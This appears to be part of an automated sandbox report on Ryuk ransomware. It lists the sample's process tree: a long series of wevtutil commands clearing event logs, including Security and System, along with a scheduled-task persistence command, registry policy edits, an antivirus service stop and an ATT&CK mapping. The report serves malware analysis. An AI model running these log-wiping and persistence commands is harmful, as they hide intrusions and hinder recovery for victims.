wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
3⤵
- Clears Windows event logs
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:1696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:1296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
- Clears Windows event logs
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
- Clears Windows event logs
PID:772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
- Clears Windows event logs
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
- Clears Windows event logs
PID:1200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
3⤵
PID:1428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
- Clears Windows event logs
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
- Clears Windows event logs
PID:1636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:1576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
3⤵
PID:1508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
3⤵
- Clears Windows event logs
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
3⤵
PID:836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
3⤵
PID:1696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
3⤵
PID:1140

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
3⤵
- Clears Windows event logs
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
3⤵
PID:696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
3⤵
- Clears Windows event logs
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
3⤵
PID:884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
3⤵
PID:1444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
3⤵
PID:572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
3⤵
- Clears Windows event logs
PID:1920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
3⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
3⤵
PID:1576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
PID:1572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
- Clears Windows event logs
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
3⤵
- Clears Windows event logs
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
PID:1800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
- Clears Windows event logs
PID:952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
3⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
- Clears Windows event logs
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:1696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:1864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
PID:1140

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
3⤵
- Clears Windows event logs
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
PID:884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:1444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
- Clears Windows event logs
PID:572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
- Clears Windows event logs
PID:1920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
- Clears Windows event logs
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
- Clears Windows event logs
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
- Clears Windows event logs
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:1860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:1576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
- Clears Windows event logs
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:1572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:1800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
- Clears Windows event logs
PID:980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "System"
3⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:1248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:1168

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
3⤵
- Creates scheduled task(s)
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:1928

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
3⤵
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:836

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:1636

C:\Windows\system32\net.exe
net stop avpsus /y
1⤵
PID:952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
2⤵
PID:1392

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:868

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
